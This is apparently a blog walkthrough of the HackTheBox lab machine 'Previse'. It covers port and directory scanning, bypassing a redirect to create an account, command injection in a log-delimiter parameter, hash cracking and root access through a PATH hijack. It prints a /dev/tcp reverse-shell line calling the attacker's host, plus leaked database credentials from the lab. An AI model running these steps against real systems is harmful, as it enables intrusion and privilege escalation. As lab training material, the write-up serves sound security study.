This post is about the Walkthrough of the hackthebox machine: Previce
Hackthebox Previce Walkthrough Link to heading
Port/Vuln Enumeration Link to heading
─$ sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.11.104
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-29 20:38 EDT
Nmap scan report for 10.10.11.104
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.11 seconds
┌──(rocky㉿kali)-[~/hckbox/previce]
└─$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-29 20:39 EDT
Warning: 10.10.11.104 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.104
Host is up (0.052s latency).
All 65535 scanned ports on 10.10.11.104 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.40 seconds
┌──(rocky㉿kali)-[~/hckbox/previce]
nmap -Pn -p 22,80 -sC -sV -oN details1.txt 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-31 19:45 EDT
Nmap scan report for 10.10.11.104
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
Directory Scan Link to heading
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/31 19:41:48 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/server-status (Status: 403) [Size: 277]
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/05/31 20:09:48 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 277]
Front Page Link to heading
As per the directory scan , it revelaled few php pages. I could see a account creation page hower it gives 302 error.
However on the front its just a redirection.
If i intercept the respose as well, i can see the page is visible however some restriction are there which prevents the page from loading while we browse.
I am going to modify the respose request from from 302 to 200.Now we can access this page.
Now create a dummy account and repeat the same steps above to intercept the response and modify it from 302 to 200.
User has been added succesfully.
Exploitation Link to heading
Now login with the new credentails
It seems like a site backup file is found,once we logged in
After checking few files, config.php seems conatain mysql database password
$ unzip -d bkp siteBackup.zip
Archive: siteBackup.zip
inflating: bkp/accounts.php
inflating: bkp/config.php
inflating: bkp/download.php
inflating: bkp/file_logs.php
inflating: bkp/files.php
inflating: bkp/footer.php
inflating: bkp/header.php
inflating: bkp/index.php
inflating: bkp/login.php
inflating: bkp/logout.php
inflating: bkp/logs.php
inflating: bkp/nav.php
inflating: bkp/status.php
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles]
└─$ ls
bkp siteBackup.zip
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles]
└─$ cd bkp
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles/bkp]
└─$ ls
accounts.php config.php download.php file_logs.php files.php footer.php header.php index.php login.php logout.php logs.php nav.php status.php
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles/bkp]
└─$ cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
We have few more files to check and one other file “logs.php” seems intresting as well.
─$ cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>
<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
$filepath = "/var/www/out.log";
$filename = "out.log";
Under Management menu tab there is button for log data and once we click that below page opens
If i click on submit it will download a log file. The log file looks like this:
There is a drop down as delimiter and if i select space the out.log file will be different
However in the dropdown selectors only few options are there. Lets intercept the traffic with burp and edit the delimiter to rchitect. It chnages the output like this.
Before trying the reverse shell script, lets try to see if we can add ping command by intercepting using burp.
It works, I can see the ping received.
Initial Reverse shell Link to heading
Similiar way we added ping command lets insert the netcat reverse shell script and we got the reverse shell:
Shell as m4lwhere Link to heading
The Initial shell we received did not have a permission to read the user.txt flag.
cd /home
cd /home
ls
ls
m4lwhere
cd m4lwhere
cd m4lwhere
ls
ls
user.txt
cat user.txt
cat user.txt
cat: user.txt: Permission denied
ls
Now we need to escalate to this user. We have mysql config file which we have received earlier. The same can be found here as well once we login
d /var/www/html
ls -al
ls -al
total 188
drwxr-xr-x 4 www-data www-data 4096 Jul 26 2021 .
drwxr-xr-x 3 root root 4096 Jul 26 2021 ..
-rw-r--r-- 1 www-data www-data 5689 Jun 12 2021 accounts.php
-rwxrwxr-x 1 www-data www-data 16042 Jun 3 2021 android-chrome-192x192.png
-rwxrwxr-x 1 www-data www-data 50545 Jun 3 2021 android-chrome-512x512.png
-rwxrwxr-x 1 www-data www-data 14096 Jun 3 2021 apple-touch-icon.png
-rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 css
-rw-r--r-- 1 www-data www-data 1562 Jun 9 2021 download.php
-rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png
-rwxrwxr-x 1 www-data www-data 1708 Jun 3 2021 favicon-32x32.png
-rwxrwxr-x 1 www-data www-data 15406 Jun 3 2021 favicon.ico
-rw-r--r-- 1 www-data www-data 1191 Jun 12 2021 file_logs.php
-rw-r--r-- 1 www-data www-data 6107 Jun 9 2021 files.php
-rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php
-rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php
-rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 js
-rw-r--r-- 1 www-data www-data 2967 Jun 12 2021 login.php
-rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php
-rw-r--r-- 1 www-data www-data 1174 Jun 9 2021 logs.php
-rw-r--r-- 1 www-data www-data 1279 Jun 5 2021 nav.php
-rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest
-rw-r--r-- 1 www-data www-data 1900 Jun 9 2021 status.php
cat config.php
cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
Lets try connect to mysql database using the password we found:
mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'
<l$ mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)
use previse;
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
show tables;
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
describe accounts;
describe accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.00 sec)
describe files;
describe files;
+-------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(255) | NO | | NULL | |
| size | int(11) | NO | | NULL | |
| user | varchar(255) | YES | | NULL | |
| data | blob | YES | | NULL | |
| upload_time | datetime | YES | | CURRENT_TIMESTAMP | |
| protected | tinyint(1) | YES | | 0 | |
+-------------+--------------+------+-----+-------------------+----------------+
7 rows in set (0.00 sec)
select * from accounts;
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | rchitect | $1$🧂llol$HTWNNN3FVc9pRSprpZ5fV/ | 2022-06-07 23:54:02 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)
mysql>
Cracking the hashes Link to heading
We should copy the password hash to a file and crack it with hashcat.
c:\hashcat\hashcat-6.2.5\hashcat-6.2.5>.\hashcat.exe -m 500 previce.hash.txt "e:\OSCP wordlist\rockyou.txt"
hashcat (v6.2.5) starting
hipDeviceGetAttribute(): 1
Successfully initialized NVIDIA CUDA library.
With cracked password i am logged into ssh
ssh m4lwhere@10.10.11.104 6 ⨯
The authenticity of host '10.10.11.104 (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.104' (ED25519) to the list of known hosts.
m4lwhere@10.10.11.104's password:
Permission denied, please try again.
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jun 8 00:59:08 UTC 2022
System load: 0.0 Processes: 175
Usage of /: 49.4% of 4.85GB Users logged in: 0
Memory usage: 21% IP address for eth0: 10.10.11.104
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ whoami
m4lwhere
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
I could see there is backup script which can be run by m4lwhere user as root if used with sudo command. The script does not run with any cron job, we have to type the command. As per checking the persmission of file we cant edit the file. However we can view the contents of script:
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$ ls -al /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun 6 2021 /opt/scripts/access_backup.sh
Privilege escalation to root Link to heading
One exploit which we can try here is that, in this script no path variable is defined for “gzip” or “date”
I am trying to create a simple script under tmp and chnage the path varaiable to tmp folder .
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
[sudo] password for m4lwhere:
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
# rev shell
bash -i >& /dev/tcp/10.10.14.2/8989 0>&1
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
Shell as root
ocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989 1 ⨯
listening on [any] 8989 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.104] 56358
whoami
whoami
root
hostname
hostname
previse
ls
ls
gzip
pspy32
systemd-private-f8ec934eb2824a399942682a61350064-apache2.service-P7UkoS
systemd-private-f8ec934eb2824a399942682a61350064-systemd-resolved.service-TGKIEq
systemd-private-f8ec934eb2824a399942682a61350064-systemd-timesyncd.service-xieqH9
vmware-root_808-2965972425
cd /root
cd /root
ls -al
ls -al
total 36
drwx------ 6 root root 4096 Jul 28 2021 .
drwxr-xr-x 24 root root 4096 Jul 27 2021 ..
lrwxrwxrwx 1 root root 9 Jun 6 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 26 2021 .cache
drwx------ 3 root root 4096 Jul 26 2021 .gnupg
drwxr-xr-x 3 root root 4096 Jul 26 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Jun 7 23:37 root.txt
drwx------ 2 root root 4096 Jul 26 2021 .ssh
lrwxrwxrwx 1 root root 9 Jul 28 2021 .viminfo -> /dev/null
ls root.txt
ls root.txt
root.txt
ls -al root.txt
ls -al root.txt
-r-------- 1 root root 33 Jun 7 23:37 root.txt
Key learnings Link to heading
The directory scan revealed just the directories first and make sure to run the file findings based on key extensions like php,css etc. This revealed the account creation page.
In this case we did intercept the response page also to see why it’s not allowing an account creation. The 302 to 200 response page modification allows us to create an account in this.
Before reverse shell command you can always try the ping command to see if the websites accepts the modified requests. In this case the ping command was tested succesfully to confirm the command injection.
Familiarize with mysql database commands, as many cases we get the mysql username and password. The hash cat helps us to decode the hash.
If we found a user can run a script as root and if the script or results are not modified by the user , most likely we need to exploit the parameters used in the script. In this case gzip or date parameter could have exploited. The reason why these parameters are exploitable due to the script does not clearly say the path of these binaries .For ex: /usr/bin etc. So we modified the path variables to add /tmp and created a gzip exceutable script with reverse shell.